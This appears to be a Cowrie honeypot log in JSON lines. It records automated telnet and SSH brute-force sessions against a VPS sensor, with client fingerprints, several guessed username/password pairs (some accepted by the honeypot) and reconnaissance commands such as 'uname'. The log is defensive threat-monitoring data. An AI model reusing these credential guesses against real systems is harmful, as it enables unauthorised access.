{"eventid":"cowrie.session.connect","src_ip":"159.223.79.241","src_port":49746,"dst_ip":"1.2.3.4","dst_port":23,"session":"67fb3a49f3c7","protocol":"telnet","message":"New connection: 159.223.79.241:49746 (1.2.3.4:23) [session: 67fb3a49f3c7]","sensor":"my-vps","timestamp":"2025-08-31T00:37:02.995997Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T00:37:04.304503Z","src_ip":"159.223.79.241","session":"67fb3a49f3c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37860,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8d6500e887b","protocol":"ssh","message":"New connection: 212.227.125.160:37860 (1.2.3.4:22) [session: c8d6500e887b]","sensor":"my-vps","timestamp":"2025-08-31T00:37:04.750505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:37:04.751500Z","src_ip":"212.227.125.160","session":"c8d6500e887b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:37:04.825205Z","src_ip":"212.227.125.160","session":"c8d6500e887b"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-31T00:37:05.052139Z","src_ip":"212.227.125.160","session":"c8d6500e887b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:06.186042Z","src_ip":"212.227.125.160","session":"c8d6500e887b"}
{"eventid":"cowrie.session.closed","duration":5.302886724472046,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:08.298821Z","src_ip":"159.223.79.241","session":"67fb3a49f3c7"}
{"eventid":"cowrie.session.connect","src_ip":"159.223.79.241","src_port":35256,"dst_ip":"1.2.3.4","dst_port":23,"session":"3602f3431dee","protocol":"telnet","message":"New connection: 159.223.79.241:35256 (1.2.3.4:23) [session: 3602f3431dee]","sensor":"my-vps","timestamp":"2025-08-31T00:37:08.475592Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:37:09.318617Z","src_ip":"159.223.79.241","session":"3602f3431dee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:37:09.333941Z","src_ip":"159.223.79.241","session":"3602f3431dee"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T00:37:09.994612Z","src_ip":"159.223.79.241","session":"3602f3431dee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:11.055594Z","src_ip":"159.223.79.241","session":"3602f3431dee"}
{"eventid":"cowrie.session.closed","duration":2.5830776691436768,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:11.058599Z","src_ip":"159.223.79.241","session":"3602f3431dee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36872,"dst_ip":"1.2.3.4","dst_port":22,"session":"021e0ba4ac3d","protocol":"ssh","message":"New connection: 212.227.235.229:36872 (1.2.3.4:22) [session: 021e0ba4ac3d]","sensor":"my-vps","timestamp":"2025-08-31T00:37:13.443570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:37:14.344396Z","src_ip":"212.227.235.229","session":"021e0ba4ac3d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:37:14.345124Z","src_ip":"212.227.235.229","session":"021e0ba4ac3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47628,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a895a2c6303","protocol":"ssh","message":"New connection: 212.227.125.160:47628 (1.2.3.4:22) [session: 3a895a2c6303]","sensor":"my-vps","timestamp":"2025-08-31T00:37:15.208149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:37:15.208951Z","src_ip":"212.227.125.160","session":"3a895a2c6303"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:37:15.283041Z","src_ip":"212.227.125.160","session":"3a895a2c6303"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:37:15.538421Z","src_ip":"212.227.125.160","session":"3a895a2c6303"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33770,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b4b77eda7f4","protocol":"ssh","message":"New connection: 212.227.235.229:33770 (1.2.3.4:22) [session: 2b4b77eda7f4]","sensor":"my-vps","timestamp":"2025-08-31T00:37:16.006949Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:37:16.007879Z","src_ip":"212.227.235.229","session":"2b4b77eda7f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:37:16.310977Z","src_ip":"212.227.235.229","session":"2b4b77eda7f4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:16.713192Z","src_ip":"212.227.125.160","session":"3a895a2c6303"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"FH.197[]jhk/@","message":"login attempt [mysql/FH.197[]jhk/@] failed","sensor":"my-vps","timestamp":"2025-08-31T00:37:17.578904Z","src_ip":"212.227.235.229","session":"2b4b77eda7f4"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:18.884020Z","src_ip":"212.227.235.229","session":"2b4b77eda7f4"}
{"eventid":"cowrie.login.failed","username":"backup","password":"P@ssw0rd123","message":"login attempt [backup/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:37:20.398063Z","src_ip":"212.227.235.229","session":"021e0ba4ac3d"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:22.346836Z","src_ip":"212.227.235.229","session":"021e0ba4ac3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39608,"dst_ip":"1.2.3.4","dst_port":22,"session":"fbd59c8b8d31","protocol":"ssh","message":"New connection: 212.227.125.160:39608 (1.2.3.4:22) [session: fbd59c8b8d31]","sensor":"my-vps","timestamp":"2025-08-31T00:37:25.600251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:37:25.601112Z","src_ip":"212.227.125.160","session":"fbd59c8b8d31"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:37:25.675000Z","src_ip":"212.227.125.160","session":"fbd59c8b8d31"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:37:25.897079Z","src_ip":"212.227.125.160","session":"fbd59c8b8d31"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:37:26.696028Z","src_ip":"212.227.125.160","session":"fbd59c8b8d31"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:37:26.696834Z","src_ip":"212.227.125.160","session":"fbd59c8b8d31"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:26.775261Z","src_ip":"212.227.125.160","session":"fbd59c8b8d31"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:26.776611Z","src_ip":"212.227.125.160","session":"fbd59c8b8d31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55976,"dst_ip":"1.2.3.4","dst_port":22,"session":"e67cf0291d8f","protocol":"ssh","message":"New connection: 212.227.125.160:55976 (1.2.3.4:22) [session: e67cf0291d8f]","sensor":"my-vps","timestamp":"2025-08-31T00:37:35.351738Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42170,"dst_ip":"1.2.3.4","dst_port":22,"session":"0767043dddc5","protocol":"ssh","message":"New connection: 212.227.125.160:42170 (1.2.3.4:22) [session: 0767043dddc5]","sensor":"my-vps","timestamp":"2025-08-31T00:37:35.937025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:37:35.937948Z","src_ip":"212.227.125.160","session":"0767043dddc5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:37:35.964785Z","src_ip":"212.227.125.160","session":"e67cf0291d8f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:37:35.965657Z","src_ip":"212.227.125.160","session":"e67cf0291d8f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:37:36.009727Z","src_ip":"212.227.125.160","session":"0767043dddc5"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:37:36.228343Z","src_ip":"212.227.125.160","session":"0767043dddc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:37:36.551151Z","src_ip":"212.227.125.160","session":"0767043dddc5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T00:37:36.551871Z","src_ip":"212.227.125.160","session":"0767043dddc5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:36.625767Z","src_ip":"212.227.125.160","session":"0767043dddc5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:36.628466Z","src_ip":"212.227.125.160","session":"0767043dddc5"}
{"eventid":"cowrie.login.failed","username":"backup","password":"P@ssw0rd123","message":"login attempt [backup/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:37:39.622911Z","src_ip":"212.227.125.160","session":"e67cf0291d8f"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:40.800888Z","src_ip":"212.227.125.160","session":"e67cf0291d8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39770,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d02b42a9634","protocol":"ssh","message":"New connection: 212.227.125.160:39770 (1.2.3.4:22) [session: 6d02b42a9634]","sensor":"my-vps","timestamp":"2025-08-31T00:37:46.306356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:37:46.307223Z","src_ip":"212.227.125.160","session":"6d02b42a9634"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:37:46.380730Z","src_ip":"212.227.125.160","session":"6d02b42a9634"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-31T00:37:46.616078Z","src_ip":"212.227.125.160","session":"6d02b42a9634"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:37:47.750294Z","src_ip":"212.227.125.160","session":"6d02b42a9634"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49090,"dst_ip":"1.2.3.4","dst_port":22,"session":"7737848071a2","protocol":"ssh","message":"New connection: 212.227.125.160:49090 (1.2.3.4:22) [session: 7737848071a2]","sensor":"my-vps","timestamp":"2025-08-31T00:37:56.767569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:37:56.768616Z","src_ip":"212.227.125.160","session":"7737848071a2"}
